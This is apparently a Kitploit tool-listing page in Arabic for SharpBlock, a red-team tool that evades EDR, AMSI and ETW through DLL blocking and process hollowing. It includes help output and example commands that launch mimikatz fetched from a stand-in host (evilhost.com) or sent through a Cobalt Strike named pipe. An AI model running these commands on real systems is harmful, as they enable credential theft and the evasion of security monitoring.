Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/ccob/sharpblock
الفريق الأحمر
GitHubccob/sharpblock

SharpBlock

طريقة لتجاوز وحدات DLL الخاصة بالحماية النشطة لـ EDR عن طريق منع تنفيذ نقطة الدخول

عرض المستودع
1.2k165منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SharpBlock

طريقة لتجاوز DLLs الإسقاط النشط لـ EDR عن طريق منع تنفيذ نقطة الدخول.

الميزات

  • يمنع تنفيذ نقطة الدخول لـ DLL الخاصة بـ EDR، مما يمنع وضع خطافات EDR.
  • تجاوز AMSI بدون تصحيح غير قابل للكشف من قبل الماسحات الضوئية التي تبحث عن تصحيحات كود Amsi.dll في وقت التشغيل.
  • عملية مضيف يتم استبدالها بـ PE زرع يمكن تحميله من القرص أو HTTP أو named pipe (Cobalt Strike)
  • العملية المزروعة مخفية للمساعدة في تجنب الماسحات الضوئية التي تبحث عن العمليات المجوفة.
  • وسائط سطر الأوامر مزيفة وتُزرع بعد إنشاء العملية باستخدام طريقة اكتشاف EDR خفية.
  • تجاوز ETW بدون تصحيح.
  • يمنع استدعاء NtProtectVirtualMemory عندما يكون المتلقي ضمن نطاق مساحة عنوان DLL المحظورة.
root@kitploit:~
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the lauched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypassAmsi
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

أمثلة

إطلاق mimikatz عبر HTTP باستخدام notepad كعملية مضيفة، مع حظر DLL الخاص بـ SylantStrike

root@kitploit:~
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

إطلاق mimikatz باستخدام Cobalt Strike beacon عبر named pipe باستخدام notepad كعملية مضيفة، مع حظر DLL الخاص بـ SylantStrike

root@kitploit:~
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

ملاحظة: بالنسبة لأمر beacon upload_file، قم بتحميل upload.cna في مدير البرامج النصية لـ Cobalt Strike

المقالات المصاحبة:

  • https://ethicalchaos.dev/2020/05/27/lets-create-an-edr-and-bypass-it-part-1/
  • https://ethicalchaos.dev/2020/06/14/lets-create-an-edr-and-bypass-it-part-2/
  • https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/
تنزيل الأداة